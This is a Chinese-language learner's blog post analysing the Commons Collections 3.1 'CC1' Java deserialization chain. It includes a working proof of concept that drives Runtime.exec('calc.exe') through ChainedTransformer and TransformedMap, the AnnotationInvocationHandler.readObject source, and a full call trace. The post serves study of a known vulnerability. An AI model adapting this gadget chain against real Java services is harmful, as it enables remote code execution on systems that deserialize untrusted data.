javaweb--cc1分析(1)

InvokerTransformerCC1链的漏洞点位于commons-collections-3.1.jarorgapachecommonscollectionsfunctorsInvokerTransformer.class中反射加载参数可控

 可以发现触发点在调用了InvokerTransformer类的Transformer方法(也就是反射命令执行点)

我们先了解一下这些类

TransformedMap
InvokerTransformer
ConstantTransformer
ChainedTransformer

TransformedMap

我们看代码这里调用的是decorate方法

debug代码

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class TransformedMap_class {
    public static void main(String[] args) throws Exception{
        Map innerMap = new HashMap();
        innerMap.put("N0lan", "value");
        Map outerMap = TransformedMap.decorate(innerMap, new Hello(), new Hello1());
        Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();
        onlyElement.setValue("foobar");
    }
}
class Hello implements Transformer {
    @Override
    public Object transform(Object input) {
        System.out.println(input.toString());
        return "Hello";
    }
}


class Hello1 implements Transformer {
    @Override
    public Object transform(Object input) {
        System.out.println(input.toString());
        return "Hello1";
    }
}

　　可以发现这个函数就是完成实列化的过程，并且调用对象的trasform方法

 InvokerTransformer

此类里面的transform类在input不为空的时候会触发反射加载从而导致命令执行

 ConstantTransformer

返回值为当前参数的对象

 ChainedTransformer

 ChainedTransformer类的transform方法把传入的对象依次执行tranform方法后返回

这里会返回在之后调用InvokerTransformer.transform(Runtime)

TransformedMap利用链

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class ccONE {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.getRuntime()),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
        };

        //将transformers数组存入ChaniedTransformer这个继承类
        Transformer transformerChain = new ChainedTransformer(transformers);

        //创建Map并绑定transformerChain
        Map innerMap = new HashMap();
        innerMap.put(null, null);
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);

        //触发漏洞
        Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();
        onlyElement.setValue(null);

    }}

　　调试发现是这样调用到InvokerTransformer的transform方法的

transform:124, InvokerTransformer (org.apache.commons.collections.functors)
transform:122, ChainedTransformer (org.apache.commons.collections.functors)
checkSetValue:169, TransformedMap (org.apache.commons.collections.map)
setValue:191, AbstractInputCheckedMapDecorator$MapEntry (org.apache.commons.collections.map)
main:27, ccONE

反序列化

 这里 要用到AnnotationInvocationHandler.readObject()函数 不然 得化这个点就会很鸡肋 ，的反序列化在转换成Map(Entry)然后调用.setValue()才能触发exp，很难找这样的点

但是AnnotationInvocationHandler 恰好满足了这点 这里由于是萌新所以一步一步分析

private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
        var1.defaultReadObject(); 
        AnnotationType var2 = null;

        try {
            var2 = AnnotationType.getInstance(this.type);
        } catch (IllegalArgumentException var9) {
            throw new InvalidObjectException("Non-annotation type in annotation serial stream");
        }

        Map var3 = var2.memberTypes();
        Iterator var4 = this.memberValues.entrySet().iterator();//迭代

        while(var4.hasNext()) {
            Entry var5 = (Entry)var4.next();//转换为Entry
            String var6 = (String)var5.getKey();
            Class var7 = (Class)var3.get(var6);
            if (var7 != null) {
                Object var8 = var5.getValue();
                if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                    var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
                }
            }
        }

　

 至于为什么map key必须绑定为value

https://xz.aliyun.com/t/7031#toc-9

因此完整的调用过程链是

ObjectInputStream.readObject()
	ObjectInputStream.readObject0()
		ObjectInputStream.readOrdinaryObject()
			ObjectInputStream.readSerialData()
				ObjectStreamClass.invokeReadObject()
					Method.invoke()
				DelegatingMethodAccessorImpl.invoke()
							NativeMethodAccessorImpl.invoke()
								NativeMethodAccessorImpl.invoke0()
									AnnotationInvocationHandler.readObject()
										MapEntry.setValue()
                    TransformedMap.checkSetValue()
                            ChainedTransformer.transform()
                                ConstantTransformer.transform()
                                InvokerTransformer.transform()
                                    Method.invoke()
                                        Class.getMethod()
                                InvokerTransformer.transform()
                                    Method.invoke()
                                        Runtime.getRuntime()
                                InvokerTransformer.transform()
                                    Method.invoke()
                                        Runtime.exec()

　参考

https://www.cnblogs.com/nice0e3/p/13860621.html
https://mochazz.github.io/page/2/
https://blog.0kami.cn/archives/
https://www.anquanke.com/post/id/195865
https://www.cnblogs.com/kuaile1314/p/14239718.html
https://xz.aliyun.com/t/4711#toc-3
https://xz.aliyun.com/t/7031#toc-9

　　

：学习java cc1就这么难 后面还咋学呀，学一点算一点吧 少就是多 满慢就是快